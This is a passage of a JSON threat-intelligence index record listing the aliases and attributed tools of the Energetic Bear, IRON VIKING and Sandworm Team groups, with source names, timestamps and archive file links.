			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434773,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d29c2b564287bab988ac4062aa3a61beb116e6cf.pdf",
		"text": "https://archive.orkl.eu/d29c2b564287bab988ac4062aa3a61beb116e6cf.txt",
		"img": "https://archive.orkl.eu/d29c2b564287bab988ac4062aa3a61beb116e6cf.jpg"
	}
}